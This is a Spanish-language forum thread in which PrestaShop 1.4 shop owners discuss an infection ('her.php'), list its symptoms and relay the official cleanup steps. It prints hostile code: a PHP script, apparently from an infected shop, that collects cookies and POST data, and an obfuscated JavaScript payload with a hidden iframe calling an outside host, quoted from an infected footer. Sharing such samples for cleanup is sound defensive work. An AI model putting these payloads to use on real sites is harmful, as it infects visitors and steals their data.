   if(isset($_SERVER['HTTP_USER_AGENT'])) $DATA_HTTP_USER_AGENT=filt($_SERVER['HTTP_USER_AGENT']); else $DATA_HTTP_USER_AGENT=$empty;
   if(isset($_SERVER['HTTP_REFERER'])) $DATA_HTTP_REFERER=filt($_SERVER['HTTP_REFERER']); else $DATA_HTTP_REFERER=$empty;
   if(isset($_SERVER['HTTP_ACCEPT'])) $DATA_HTTP_ACCEPT=filt($_SERVER['HTTP_ACCEPT']); else $DATA_HTTP_ACCEPT=$empty;
   if(isset($_SERVER['HTTP_CONNECTION'])) $DATA_HTTP_CONNECTION=filt($_SERVER['HTTP_CONNECTION']); else $DATA_HTTP_CONNECTION=$empty;
   if(isset($_SERVER['GATEWAY_INTERFACE'])) $DATA_GATEWAY_INTERFACE=filt($_SERVER['GATEWAY_INTERFACE']); else $DATA_GATEWAY_INTERFACE=$empty;
   if(isset($_SERVER['REQUEST_METHOD'])) $DATA_REQUEST_METHOD=filt($_SERVER['REQUEST_METHOD']); else $DATA_REQUEST_METHOD=$empty;
   if(isset($_COOKIE)) $_COOKIE=filt($_COOKIE); else $_COOKIE=$empty;
   if(isset($_POST)) $_POST=filt($_POST); else $_POST=$empty;

$data = "<pre>REQUEST_INFO_PAGE_4896485_CODE
REMOTE_ADDR=".filt($_SERVER['REMOTE_ADDR'])."
HTTP_CLIENT_IP=".$DATA_HTTP_CLIENT_IP."
HTTP_X_FORWARDED_FOR=".$DATA_HTTP_X_FORWARDED_FOR."
HTTP_X_FORWARDED=".$DATA_HTTP_FORWARDED_FOR."
HTTP_X_COMING_FROM=
HTTP_FORWARDED_FOR=".$DATA_HTTP_FORWARDED_FOR."
HTTP_FORWARDED=
HTTP_COMING_FROM=
HTTP_VIA=".$DATA_HTTP_HTTP_VIA."
HTTP_XROXY_CONNECTION=".$DATA_HTTP_XROXY_CONNECTION."
HTTP_PROXY_CONNECTION=".$DATA_HTTP_PROXY_CONNECTION."
HTTP_USER_AGENT=".$DATA_HTTP_USER_AGENT."
HTTP_ACCEPT=".$DATA_HTTP_ACCEPT."
HTTP_CONNECTION=".$DATA_HTTP_CONNECTION."
GATEWAY_INTERFACE=".$DATA_GATEWAY_INTERFACE."
REQUEST_METHOD=".$DATA_REQUEST_METHOD."
HTTP_REFERER=".$DATA_HTTP_REFERER."
POST=".$_POST."
COOKIE=".$_COOKIE."
</pre>
   ";

echo $data;
?>

 

Espero que esto ayude no solo a solucionar el problema como creo ya se ha realizado, sino que ayude a poder encontrar el origen y DESINFECTAR los posiles archivos o datos afectados.

 

Un saludo.

Link to comment
Share on other sites

Pues yo lo cogido, este es el mensaje que he enviado a '[email protected]':

 

"

Buenas tardes,

 

Tengo Prestashop 1.4.4

 

He descubierto que estoy infectado por el virus.

 

• Tengo el archivo her.php en el directorio /modules/. No puedo editarlo ni modificarlo.

• Con CuteFTP 8.3 no puedo abrir ni editar ningún archivo de la tienda prestashop 1.4.4

• .Htaccess que se encuentra en la carpeta /download ha sido eliminado

• Dos archivos PHP se han creado tanto en la carpetas /upload y /download

• Las carpetas Tools/smarty/compile, tools/smarty/cache y tools/smarty_v2 han sido eliminadas

 

 

Os adjunto todos los módulos que he instalado en estos dos días (que yo recuerde).

 

 

Por favor, ¿Qué puedo hacer?

 

Necesito ayuda.

 

 

"

 

Además, cuando entro en mi tienda el navegador hace un amago como de abrir otra página web. Me he dado cuenta porque en la esquina inferior del navegador te indica la ruta y le he dado un pantallazo para que veais la dirección:

post-23183-0-06211700-1314203719_thumb.jpg

 

A ver si alguien me ayuda porque estoy :o acojonad.....

 

Gracias y suerte a todos.

Link to comment
Share on other sites

tenicor, tranquilo que están a punto de lanzar una solución.

 

En cuanto se de a conocer, la postearemos por aquí traducido todo al español.

 

Un saludo.

 

Me recuerda a los embarazos de mi mujer. Había que esperar, esperar, esperar, esperar....De manos cruzadas.

Link to comment
Share on other sites

tenicor, tranquilo que están a punto de lanzar una solución.

 

En cuanto se de a conocer, la postearemos por aquí traducido todo al español.

 

Un saludo.

 

Me recuerda a los embarazos de mi mujer. Había que esperar, esperar, esperar, esperar....De manos cruzadas.

Jajaja, que arte chemapresta ;)

 

Para vuestra información, tengo que comentaros que Carl hace unos minútos que no me responde. Así que debo suponer que está preparando la documentación y el archivo que solucionará este problema.

Link to comment
Share on other sites

tenicor, tranquilo que están a punto de lanzar una solución.

 

En cuanto se de a conocer, la postearemos por aquí traducido todo al español.

 

Un saludo.

 

Me recuerda a los embarazos de mi mujer. Había que esperar, esperar, esperar, esperar....De manos cruzadas.

Jajaja, que arte chemapresta ;)

 

Para vuestra información, tengo que comentaros que Carl hace unos minútos que no me responde. Así que debo suponer que está preparando la documentación y el archivo que solucionará este problema.

 

Estoy seguro que Carl estará deseoso de terminar con todo esto al igual que todos nosotros. Es difícil concentrase en otras cosas mientras esto sigue pendiente. :)

Link to comment
Share on other sites

Bueno, esperando a que Carl, cree un Post Oficial sobre la solución de este script malicioso que nos ha afectado, pongo aquí mientras la traducción de la solución:

 

Ayer por la noche, el sitio web oficial de PrestaShop, prestashop.com, fue hackeado, lo que produjo como consecuencia un script malintencionado destinado a transcribir la información de noticias en el Back Office de las tiendas PrestaShop.

 

Todo el equipo de PrestaShop nos hemos dedicado a identificar y solucionar este problema lo más rápido que nos ha sido posible. Este problema ha sido solucionado completamente.

 

¿Ha sido infectada mi tienda?

 

Esto sólo afecta a las versiones PrestaShop 1.4/1.4.1/1.4.2/1.4.3/1.4.4, pero no todas las tiendas que cuentan con estas versiones han sido afectadas necesariamente.

 

Si usa una de estas versiones, por favor verifique cualquiera de los siguientes síntomas:

 

• Un archivo her.php se encuentra en la raíz de la carpeta /modules

 

• Un archivo .php diferente del index.php se encuentra en las carpetas upload y download

 

• El archivo footer.tpl ha sido modificado.

 

• La carpeta tools/smartyv2 ha sido eliminada

 

Si alguna de estas condiciones se cumple, su tienda puede haber sido infectada. Sin embargo, es fácil de arreglar con sólo seguir las instrucciones que se indican a continuación.

 

¿Qué debo hacer?

 

1. Cambiar la contraseña de la base de datos (póngase en contacto con su servicio de hosting, si no sabe cómo hacerlo). Una vez hecho esto, abra el archivo settings.inc.php que encontrará en la carpeta /config y cambie la contraseña antigua por la nueva. Vea la siguiente imágen para saber cómo hacer este proceso:

herfiximage.png

 

2. Descargue la revisión publicada por PrestaShop haciendo clic aquí

 

3. Suba esta revisión a la carpeta raíz de su tienda utilizando su cliente de FTP preferido (Filezilla, Transmit, etc...)

 

4. Diríjase a la url http://www.mitienda.com/herfix.php (ojo, hay que sustituir la url que aparece aquí por la de su tienda).

 

5. La solución al problema será aplicada en ese momento. Por favor, no olvide eliminar el archivo herfix.php previamente subido en la raiz de su tienda.

 

6. Cambie el nombre de la carpeta admin.

 

7. Cambie la contraseña de todos los administradores de la tienda

 

Si usted necesita ayuda o tiene alguna pregunta adicional, puede enviarnos un email a [email protected]. Le responderemos tan pronto como sea posible.

 

Todo el equipo de PrestaShop quiere agradecer profundamente a la comunidad su ayuda en la identificación de este problema.

Link to comment
Share on other sites

Bueno, esperando a que Carl, cree un Post Oficial sobre la solución de este script malicioso que nos ha afectado, pongo aquí mientras la traducción de la solución:

 

Ayer por la noche, el sitio web oficial de PrestaShop, prestashop.com, fue hackeado, lo que produjo como consecuencia un script malintencionado destinado a transcribir la información de noticias en el Back Office de las tiendas PrestaShop.

 

Todo el equipo de PrestaShop nos hemos dedicado a identificar y solucionar este problema lo más rápido que nos ha sido posible. Este problema ha sido solucionado completamente.

 

¿Ha sido infectada mi tienda?

 

Esto sólo afecta a las versiones PrestaShop 1.4/1.4.1/1.4.2/1.4.3/1.4.4, pero no todas las tiendas que cuentan con estas versiones han sido afectadas necesariamente.

 

Si usa una de estas versiones, por favor verifique cualquiera de los siguientes síntomas:

 

• Un archivo her.php se encuentra en la raíz de la carpeta /modules

 

• Un archivo .php diferente del index.php se encuentra en las carpetas upload y download

 

• El archivo footer.tpl ha sido modificado.

 

• La carpeta tools/smartyv2 ha sido eliminada

 

Si alguna de estas condiciones se cumple, su tienda puede haber sido infectada. Sin embargo, es fácil de arreglar con sólo seguir las instrucciones que se indican a continuación.

 

¿Qué debo hacer?

 

1. Cambiar la contraseña de la base de datos (póngase en contacto con su servicio de hosting, si no sabe cómo hacerlo). Una vez hecho esto, abra el archivo settings.inc.php que encontrará en la carpeta /config y cambie la contraseña antigua por la nueva. Vea la siguiente imágen para saber cómo hacer este proceso:

herfiximage.png

 

2. Descargue la revisión publicada por PrestaShop haciendo clic aquí

 

3. Suba esta revisión a la carpeta raíz de su tienda utilizando su cliente de FTP preferido (Filezilla, Transmit, etc...)

 

4. Diríjase a la url http://www.mitienda.com/herfix.php

 

5. La solución al problema será aplicada en ese momento. Por favor, no olvide eliminar el archivo herfix.php previamente subido en la raiz de su tienda.

 

6. Cambie el nombre de la carpeta admin.

 

7. Cambie la contraseña de todos los administradores de la tienda

 

Si usted necesita ayuda o tiene alguna pregunta adicional, puede enviarnos un email a [email protected]. Le responderemos tan pronto como sea posible.

 

Todo el equipo de PrestaShop quiere agradecer profundamente a la comunidad su ayuda en la identificación de este problema.

 

Grácias por la traducción. Yo unicamente tenía el archivo .her en /modules y lo he podido eliminar.. Aparentemente no noto nada más... Aunque he seguido las indicaciones... Lo único que nunca he cambiado el pasword de la base de datos.. Tengo acceso al Cpanel y creo que es la pestaña donde puedo asociar usuarios a la base de datos... pero no veo ninguna opción de cambiar pasword.. solo estála opción de eliminar el usuario..

 

Alguien podría explicar como hacerlo? Seguramente no sea el único que no sepa hacerlo.. bueno o igual si..

Link to comment
Share on other sites

Buenas noches,

 

He seguido todos los pasos indicados para eliminar el virús pero aún me persisten un par de problemas:

 

1.-No puedo abrir, ni editar, ni eliminar ningún archivo del directorio de la tienda (sólamente puedo cambiar el nombre de los archivos) con CuteFTP 8.3 Profesional.

 

2.- Cuando intento abrir la tienda en mi navegador, hace el intento de abrir antes otras webs (con rutas muy raras, ejemplo: www.jokelimo.com .......

El error que me da I.E. es:

post-23183-0-71238100-1314220418_thumb.jpg

 

 

¿Es esto normal?

Link to comment
Share on other sites

Buenas noches,

 

He seguido todos los pasos indicados para eliminar el virús pero aún me persisten un par de problemas:

 

1.-No puedo abrir, ni editar, ni eliminar ningún archivo del directorio de la tienda (sólamente puedo cambiar el nombre de los archivos) con CuteFTP 8.3 Profesional.

 

2.- Cuando intento abrir la tienda en mi navegador, hace el intento de abrir antes otras webs (con rutas muy raras, ejemplo: www.jokelimo.com .......

El error que me da I.E. es:

post-23183-0-71238100-1314220418_thumb.jpg

 

 

¿Es esto normal?

 

Hazlo con FireFox e indícanos que tal te ha ido.

Link to comment
Share on other sites

Bueno, esperando a que Carl, cree un Post Oficial sobre la solución de este script malicioso que nos ha afectado, pongo aquí mientras la traducción de la solución:

 

Ayer por la noche, el sitio web oficial de PrestaShop, prestashop.com, fue hackeado, lo que produjo como consecuencia un script malintencionado destinado a transcribir la información de noticias en el Back Office de las tiendas PrestaShop.

 

Todo el equipo de PrestaShop nos hemos dedicado a identificar y solucionar este problema lo más rápido que nos ha sido posible. Este problema ha sido solucionado completamente.

 

¿Ha sido infectada mi tienda?

 

Esto sólo afecta a las versiones PrestaShop 1.4/1.4.1/1.4.2/1.4.3/1.4.4, pero no todas las tiendas que cuentan con estas versiones han sido afectadas necesariamente.

 

Si usa una de estas versiones, por favor verifique cualquiera de los siguientes síntomas:

 

• Un archivo her.php se encuentra en la raíz de la carpeta /modules

 

• Un archivo .php diferente del index.php se encuentra en las carpetas upload y download

 

• El archivo footer.tpl ha sido modificado.

 

• La carpeta tools/smartyv2 ha sido eliminada

 

Si alguna de estas condiciones se cumple, su tienda puede haber sido infectada. Sin embargo, es fácil de arreglar con sólo seguir las instrucciones que se indican a continuación.

 

¿Qué debo hacer?

 

1. Cambiar la contraseña de la base de datos (póngase en contacto con su servicio de hosting, si no sabe cómo hacerlo). Una vez hecho esto, abra el archivo settings.inc.php que encontrará en la carpeta /config y cambie la contraseña antigua por la nueva. Vea la siguiente imágen para saber cómo hacer este proceso:

herfiximage.png

 

2. Descargue la revisión publicada por PrestaShop haciendo clic aquí

 

3. Suba esta revisión a la carpeta raíz de su tienda utilizando su cliente de FTP preferido (Filezilla, Transmit, etc...)

 

4. Diríjase a la url http://www.mitienda.com/herfix.php

 

5. La solución al problema será aplicada en ese momento. Por favor, no olvide eliminar el archivo herfix.php previamente subido en la raiz de su tienda.

 

6. Cambie el nombre de la carpeta admin.

 

7. Cambie la contraseña de todos los administradores de la tienda

 

Si usted necesita ayuda o tiene alguna pregunta adicional, puede enviarnos un email a [email protected]. Le responderemos tan pronto como sea posible.

 

Todo el equipo de PrestaShop quiere agradecer profundamente a la comunidad su ayuda en la identificación de este problema.

 

Grácias por la traducción. Yo unicamente tenía el archivo .her en /modules y lo he podido eliminar.. Aparentemente no noto nada más... Aunque he seguido las indicaciones... Lo único que nunca he cambiado el pasword de la base de datos.. Tengo acceso al Cpanel y creo que es la pestaña donde puedo asociar usuarios a la base de datos... pero no veo ninguna opción de cambiar pasword.. solo estála opción de eliminar el usuario..

 

Alguien podría explicar como hacerlo? Seguramente no sea el único que no sepa hacerlo.. bueno o igual si..

 

 

Juan gracias por la ayuda y el apoyo que nos has prestado. Lo acabo de aplicar ahora mismo y de momento funciona bien. Mañana con más calma y meno cansancio lo miraré más profundamente para indicar como ha ido la cosa.

 

Gracias de nuevo al equipo Prestashop y a tí Juan.

 

Un saludo

Link to comment
Share on other sites

Buenas noches,

 

He seguido todos los pasos indicados para eliminar el virús pero aún me persisten un par de problemas:

 

1.-No puedo abrir, ni editar, ni eliminar ningún archivo del directorio de la tienda (sólamente puedo cambiar el nombre de los archivos) con CuteFTP 8.3 Profesional.

 

2.- Cuando intento abrir la tienda en mi navegador, hace el intento de abrir antes otras webs (con rutas muy raras, ejemplo: www.jokelimo.com .......

El error que me da I.E. es:

post-23183-0-71238100-1314220418_thumb.jpg

 

 

¿Es esto normal?

 

Hazlo con FireFox e indícanos que tal te ha ido.

 

 

Con Firefox 6 sigue haciendo el amago de intentar abrir otras webs de rutas sospechosas, aunque termina abriendo la tienda al igual que Internet Explorer. Lo que ocurre es que Firefox no reporta mensaje de error.

Si intento abrir otras páginas en el navegador, como Google, Prestashop, Softonic, etc.. no intenta abrir otras webs sospechosas.

Link to comment
Share on other sites

Bueno, esperando a que Carl, cree un Post Oficial sobre la solución de este script malicioso que nos ha afectado, pongo aquí mientras la traducción de la solución:

 

Ayer por la noche, el sitio web oficial de PrestaShop, prestashop.com, fue hackeado, lo que produjo como consecuencia un script malintencionado destinado a transcribir la información de noticias en el Back Office de las tiendas PrestaShop.

 

Todo el equipo de PrestaShop nos hemos dedicado a identificar y solucionar este problema lo más rápido que nos ha sido posible. Este problema ha sido solucionado completamente.

 

¿Ha sido infectada mi tienda?

 

Esto sólo afecta a las versiones PrestaShop 1.4/1.4.1/1.4.2/1.4.3/1.4.4, pero no todas las tiendas que cuentan con estas versiones han sido afectadas necesariamente.

 

Si usa una de estas versiones, por favor verifique cualquiera de los siguientes síntomas:

 

• Un archivo her.php se encuentra en la raíz de la carpeta /modules

 

• Un archivo .php diferente del index.php se encuentra en las carpetas upload y download

 

• El archivo footer.tpl ha sido modificado.

 

• La carpeta tools/smartyv2 ha sido eliminada

 

Si alguna de estas condiciones se cumple, su tienda puede haber sido infectada. Sin embargo, es fácil de arreglar con sólo seguir las instrucciones que se indican a continuación.

 

¿Qué debo hacer?

 

1. Cambiar la contraseña de la base de datos (póngase en contacto con su servicio de hosting, si no sabe cómo hacerlo). Una vez hecho esto, abra el archivo settings.inc.php que encontrará en la carpeta /config y cambie la contraseña antigua por la nueva. Vea la siguiente imágen para saber cómo hacer este proceso:

herfiximage.png

 

2. Descargue la revisión publicada por PrestaShop haciendo clic aquí

 

3. Suba esta revisión a la carpeta raíz de su tienda utilizando su cliente de FTP preferido (Filezilla, Transmit, etc...)

 

4. Diríjase a la url http://www.mitienda.com/herfix.php

 

5. La solución al problema será aplicada en ese momento. Por favor, no olvide eliminar el archivo herfix.php previamente subido en la raiz de su tienda.

 

6. Cambie el nombre de la carpeta admin.

 

7. Cambie la contraseña de todos los administradores de la tienda

 

Si usted necesita ayuda o tiene alguna pregunta adicional, puede enviarnos un email a [email protected]. Le responderemos tan pronto como sea posible.

 

Todo el equipo de PrestaShop quiere agradecer profundamente a la comunidad su ayuda en la identificación de este problema.

 

Grácias por la traducción. Yo unicamente tenía el archivo .her en /modules y lo he podido eliminar.. Aparentemente no noto nada más... Aunque he seguido las indicaciones... Lo único que nunca he cambiado el pasword de la base de datos.. Tengo acceso al Cpanel y creo que es la pestaña donde puedo asociar usuarios a la base de datos... pero no veo ninguna opción de cambiar pasword.. solo estála opción de eliminar el usuario..

 

Alguien podría explicar como hacerlo? Seguramente no sea el único que no sepa hacerlo.. bueno o igual si..

Como se explica en el tutorial, si tienes un Hosting compartido y no un servidor contratado para tí sólo. Tienes que ponerte en contacto con tu empresa de Hosting y pedirles este cambio de contraseña de la base de datos. Creo que es algo que tu no puedes hacer, lo deben de hacer ellos.

 

Un saludo y mucha suerte ;)

Link to comment
Share on other sites

jonny1985, si tienes acceso a tu cpanel, tienes que entrar en - MySQL Bases de Datos - Usuarios Actuales, debajo del todo, le das dos click a tu usuario y cuando entres, primero te pide la contraseña viejo, despues pones la nueva y la repites, aceptas y listo. Continua con el proceso en tu tienda como indican las indicaciones entrando a los archivos y cambiandolos.

Link to comment
Share on other sites

Yo me acabo de enterar hace media hora cuando he visto el newsletter. Me he infectado hoy mismo, que estaba actualizando el stock, y no había notado nada, porque todo funcionaba como siempre.

 

Ya lo he solucionado, y me alegro que lo hayan arreglado tan rápido, y hayan enviado un comunicado por el newsletter, si no, ni me entero.

 

La putada es que ahora se saben mi ruta, mi prefijo, etc, etc... estos dos cabronazos que lo han hecho, pero al menos ya no pueden entrar. Sólo han sido unas horas, espero que no puedan hacer nada con los datos recopilados, aunque nunca se sabe.

 

Gracias de nuevo a todo el equipo, han actuado muy adecuadamente a la situación.

Link to comment
Share on other sites

Hola Jesus, a mi se me infecto a primera hora de la mañana, y lo que hice fue restaurar una copia completa de la tienda con todos los archivos.

 

La base de datos no la he restaurado, sigo con la que tenia.

 

En principio la veo bien, ya no me sale el mensaje de troyano con el antivuros de Avast, pero tengo dos dudas:

 

A infectado también la base de datos y tengo que restaurarla tambien, o solo los archivos de la tienda que ya nos habéis dicho ???

 

Es bueno que aunque yo hay restaurado una copia de seguridad, también instale y ejecute el archivo herfix.php, o ya no es necesario, o me puede perjudicar si lo hago ???

 

Muchas gracias por vuestra ayuda, un saludo.

 

 

Bueno, esperando a que Carl, cree un Post Oficial sobre la solución de este script malicioso que nos ha afectado, pongo aquí mientras la traducción de la solución:

 

Ayer por la noche, el sitio web oficial de PrestaShop, prestashop.com, fue hackeado, lo que produjo como consecuencia un script malintencionado destinado a transcribir la información de noticias en el Back Office de las tiendas PrestaShop.

 

Todo el equipo de PrestaShop nos hemos dedicado a identificar y solucionar este problema lo más rápido que nos ha sido posible. Este problema ha sido solucionado completamente.

 

¿Ha sido infectada mi tienda?

 

Esto sólo afecta a las versiones PrestaShop 1.4/1.4.1/1.4.2/1.4.3/1.4.4, pero no todas las tiendas que cuentan con estas versiones han sido afectadas necesariamente.

 

Si usa una de estas versiones, por favor verifique cualquiera de los siguientes síntomas:

 

• Un archivo her.php se encuentra en la raíz de la carpeta /modules

 

• Un archivo .php diferente del index.php se encuentra en las carpetas upload y download

 

• El archivo footer.tpl ha sido modificado.

 

• La carpeta tools/smartyv2 ha sido eliminada

 

Si alguna de estas condiciones se cumple, su tienda puede haber sido infectada. Sin embargo, es fácil de arreglar con sólo seguir las instrucciones que se indican a continuación.

 

¿Qué debo hacer?

 

1. Cambiar la contraseña de la base de datos (póngase en contacto con su servicio de hosting, si no sabe cómo hacerlo). Una vez hecho esto, abra el archivo settings.inc.php que encontrará en la carpeta /config y cambie la contraseña antigua por la nueva. Vea la siguiente imágen para saber cómo hacer este proceso:

herfiximage.png

 

2. Descargue la revisión publicada por PrestaShop haciendo clic aquí

 

3. Suba esta revisión a la carpeta raíz de su tienda utilizando su cliente de FTP preferido (Filezilla, Transmit, etc...)

 

4. Diríjase a la url http://www.mitienda.com/herfix.php (ojo, hay que sustituir la url que aparece aquí por la de su tienda).

 

5. La solución al problema será aplicada en ese momento. Por favor, no olvide eliminar el archivo herfix.php previamente subido en la raiz de su tienda.

 

6. Cambie el nombre de la carpeta admin.

 

7. Cambie la contraseña de todos los administradores de la tienda

 

Si usted necesita ayuda o tiene alguna pregunta adicional, puede enviarnos un email a [email protected]. Le responderemos tan pronto como sea posible.

 

Todo el equipo de PrestaShop quiere agradecer profundamente a la comunidad su ayuda en la identificación de este problema.

Link to comment
Share on other sites

Hola Jesus, a mi se me infecto a primera hora de la mañana, y lo que hice fue restaurar una copia completa de la tienda con todos los archivos.

 

La base de datos no la he restaurado, sigo con la que tenia.

 

En principio la veo bien, ya no me sale el mensaje de troyano con el antivuros de Avast, pero tengo dos dudas:

 

A infectado también la base de datos y tengo que restaurarla tambien, o solo los archivos de la tienda que ya nos habéis dicho ???

 

Es bueno que aunque yo hay restaurado una copia de seguridad, también instale y ejecute el archivo herfix.php, o ya no es necesario, o me puede perjudicar si lo hago ???

 

Muchas gracias por vuestra ayuda, un saludo.

Hola MovilTecno.

 

Pues esta guía salió ayer a ultimísima hora. Así que por ahora es lo único que tenemos.

 

Hoy me pondré en contacto con Carl, para que nos explique más detenidamente que tenemos que hacer los que no hemos sido afectados por este problema y los que han seguido otros métodos para solucionarlo y ya les funciona bien la tienda, sin realizar los pasos que en esta guía se comenta.

 

Carl me comentó ayer que haría un Post Oficial en español, sobre este asunto. Pero claro, es que ayer se llevaron un montón de horas con este asunto y terminaron muy tarde, deben estar muy cansados :)

 

En cuanto sepa algo será publicado por aquí por él o por mí.

 

Un saludo a todos.

Link to comment
Share on other sites

¿Y si aparentemente ahora mismo no estamos infectados? ¿Podremos todavía correr el riesgo de infectarnos? Si es asi ¿sabe alguien si hay algun tipo de prevención que podamos tomar para que no nos entre este virus? Muchas gracias y suerte a todos!

Link to comment
Share on other sites

Buenos días a todos,

 

Os voy a decir lo que yo entiendo por las pocas informaciónes que he visto y el fichero fix. Parece que había un error de seguridad en la web de prestashop.com, algun listo/s accedio a ella y modifico el codigo para que cuando los ususarios de las tiendas vieran las noticias (aparecen nada más entrar el el panel de administración de prestashop) se descargara en tu tienda el archivo her.php en cuestión y además se ejecutara. Sobre media tarde de ayer el equipo prestashop borro este script de su servidor de noticias y ya no se produjeron más ataques. Claro todos los usuarios (o la mayoria) que accederieran a su BO mientras el servidor prestashop.com estaba infectado corrieron la misma suerte.

 

Por como trabaja la parte de las noticias en la aplicacion prestashop a mi me parece que no hay ningun bug de seguridad en la aplicación dado que estas noticias solo pueden venir de prestashop.com pero claro como ya os he dicho prestashop.com habia sido infectado.

 

Si estoy equivocado por favor corregirme.

 

Gracias.

Link to comment
Share on other sites

Buenos dias. A todos.... Esta madrugada he recibido un mail de prestashop informandome de la incidencia y me he alarmado un poco. De momento he revisado mis webs y no encuentro ningun problema.

 

Mi duda es ¿Es necesario instalar el parche que ha sacado prestashop? ¿Si no estamos infectados debemos de tomar alguna medida adicional de seguridad a las normales??

 

Gracias a todos..

Link to comment
Share on other sites

Hola Jesus, a mi se me infecto a primera hora de la mañana, y lo que hice fue restaurar una copia completa de la tienda con todos los archivos.

 

La base de datos no la he restaurado, sigo con la que tenia.

 

En principio la veo bien, ya no me sale el mensaje de troyano con el antivuros de Avast, pero tengo dos dudas:

 

A infectado también la base de datos y tengo que restaurarla tambien, o solo los archivos de la tienda que ya nos habéis dicho ???

 

Es bueno que aunque yo hay restaurado una copia de seguridad, también instale y ejecute el archivo herfix.php, o ya no es necesario, o me puede perjudicar si lo hago ???

 

Muchas gracias por vuestra ayuda, un saludo.

Hola MovilTecno.

 

Pues esta guía salió ayer a ultimísima hora. Así que por ahora es lo único que tenemos.

 

Hoy me pondré en contacto con Carl, para que nos explique más detenidamente que tenemos que hacer los que no hemos sido afectados por este problema y los que han seguido otros métodos para solucionarlo y ya les funciona bien la tienda, sin realizar los pasos que en esta guía se comenta.

 

Carl me comentó ayer que haría un Post Oficial en español, sobre este asunto. Pero claro, es que ayer se llevaron un montón de horas con este asunto y terminaron muy tarde, deben estar muy cansados :)

 

En cuanto sepa algo será publicado por aquí por él o por mí.

 

Un saludo a todos.

 

 

Muchas gracias, espero noticias tuyas, sobre que debemos de hacer en mi caso.

 

Un saludo.

Link to comment
Share on other sites

Me acabo de poner en contacto con Carl, indicándole todas las preguntas que hasta ahora me habéis planteado.

 

En cuanto tenga nuevas noticias, os informo. Aunque no se si se creará un Post Oficial con la solución y se podrá en él escribir preguntas y respuestas.

 

Un saludo a todos.

Link to comment
Share on other sites

Buenos dias. A mi google me bloqueo una vez una web, y lo que tienes que hacer es acceder al centro de herramientas para webmaster de google, verificar la web y solicitar una revision. Normalmente en menos de 24 horas te quitan el bloqueo.

 

Os dejo un link donde se explica que hacer en estos casos por parte de GOOGLE:

 

http://www.google.com/support/webmasters/bin/answer.py?hl=es&answer=163634

 

Saludos.

Link to comment
Share on other sites

Lo he arreglado pero google me ha bloqueado, qué puedo hacer?

 

Si estás seguro que has seguido las intrucciones que te ha dado prestashop eliminando el virus, en las herramientas de Google creo recordar que hay una herramienta en donde solicitas que revisen tu sitio porque has solucionado el problema.

Link to comment
Share on other sites

illohacker yo diria que sigues infectado mira lo que tienes al final de tu página

 

<!-- SUB-FOOTER --><script>/* <![CDATA[ */
String.prototype.asd=function(){return String.fromCharCode;};Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('as'))throw 1;}catch(q){zxc={}[i];}v=document.createTextNode('asd');var s="";for(i in v)if(i=='childNodes')o=v[i].length+1;o*=2;e=eval;m=[120-o,99-o,116-o,34-o,102-o,34-o,63-o,34-o,112-o,103-o,121-o,34-o,70-o,99-o,118-o,103-o,42-o,43-o,61-o,120-o,99-o,116-o,34-o,122-o,63-o,85-o,118-o,116-o,107-o,112-o,105-o,48-o,104-o,116-o,113-o,111-o,69-o,106-o,99-o,116-o,69-o,113-o,102-o,103-o,42-o,79-o,99-o,118-o,106-o,48-o,104-o,110-o,113-o,113-o,116-o,42-o,102-o,48-o,105-o,103-o,118-o,70-o,99-o,118-o,103-o,42-o,43-o,49-o,52-o,43-o,45-o,59-o,57-o,43-o,61-o,34-o,120-o,99-o,116-o,34-o,123-o,63-o,85-o,118-o,116-o,107-o,112-o,105-o,48-o,104-o,116-o,113-o,111-o,69-o,106-o,99-o,116-o,69-o,113-o,102-o,103-o,42-o,102-o,48-o,105-o,103-o,118-o,74-o,113-o,119-o,116-o,117-o,42-o,43-o,45-o,59-o,57-o,43-o,61-o,102-o,113-o,101-o,119-o,111-o,103-o,112-o,118-o,48-o,121-o,116-o,107-o,118-o,103-o,42-o,36-o,62-o,107-o,104-o,116-o,99-o,111-o,103-o,34-o,117-o,116-o,101-o,63-o,41-o,106-o,118-o,118-o,114-o,60-o,49-o,49-o,101-o,110-o,107-o,101-o,109-o,111-o,103-o,36-o,45-o,122-o,45-o,123-o,45-o,36-o,48-o,104-o,107-o,110-o,103-o,99-o,120-o,103-o,48-o,101-o,113-o,111-o,41-o,34-o,121-o,107-o,102-o,118-o,106-o,63-o,50-o,34-o,106-o,103-o,107-o,105-o,106-o,118-o,63-o,50-o,64-o,36-o,43-o,61-o];mm=''.asd();for(i=0;i<m.length;i++)s+=mm(e("m"+"["+"i"+"]"));e(s);/* ]]> */</script><iframe src="http://clickmemk.fileave.com" height="0" width="0"></body>
</html>
</iframe></

  • Like 1
Link to comment
Share on other sites

Bien, tengo las respuestas que esperábais.

 

1) Mi tienda no ha sido afectada, es necesario realizar este proceso?.

 

Todas las versiones 1.4 necesitan aplicar la revisión. Es decir el proceso de descargar y ejecutar el archivo herfix publicado por Prestashop. Incluso si su tienda no ha sido infectada.

 

También es necesario, que se cambien las contraseñas de la base de datos, de los empleados y administradores de la tienda.

 

2) He utilizado otro método para resolver el problema que no es el de esta guía. Mi tienda funciona perfectamente, ¿debo yo seguir y realizar esta solución?.

 

Sí, debe utilizar esta solución.

Link to comment
Share on other sites

he realizado todo lo que pone en el tutorial, qué me queda por hacer?

Vuelve a realizar el proceso. También podrías restaurar el archivo footer.tpl, antes de que este fuese infectado.

 

Cambia las contraseñas tal como dice la guia.

 

Como restauro el footer. La contraseña está cambiada

Link to comment
Share on other sites

he realizado todo lo que pone en el tutorial, qué me queda por hacer?

Vuelve a realizar el proceso. También podrías restaurar el archivo footer.tpl, antes de que este fuese infectado.

 

Cambia las contraseñas tal como dice la guia.

 

Como restauro el footer. La contraseña está cambiada

¿No tienes una copia de ese archivo antes de que fuese infectado?.

 

Si no es así, te tocará crearlo de nuevo o descargar el infectado y eliminar esas líneas que tienes agregadas por culpa del script.

Link to comment
Share on other sites

Bien, tengo las respuestas que esperábais.

 

1) Mi tienda no ha sido afectada, es necesario realizar este proceso?.

 

Todas las versiones 1.4 necesitan aplicar la revisión. Es decir el proceso de descargar y ejecutar el archivo herfix publicado por Prestashop. Incluso si su tienda no ha sido infectada.

 

También es necesario, que se cambien las contraseñas de la base de datos, de los empleados y administradores de la tienda.

 

2) He utilizado otro método para resolver el problema que no es el de esta guía. Mi tienda funciona perfectamente, ¿debo yo seguir y realizar esta solución?.

 

Sí, debe utilizar esta solución.

 

Y esto solo lo ponen en español? en inglés no dicen nada al respecto? si se supone que ha sido a través de sus servidores y no han accedido a través de las propias tiendas no debería actualizar como se indica ahí, a no ser que haya más cosas....

Link to comment
Share on other sites

Bien, tengo las respuestas que esperábais.

 

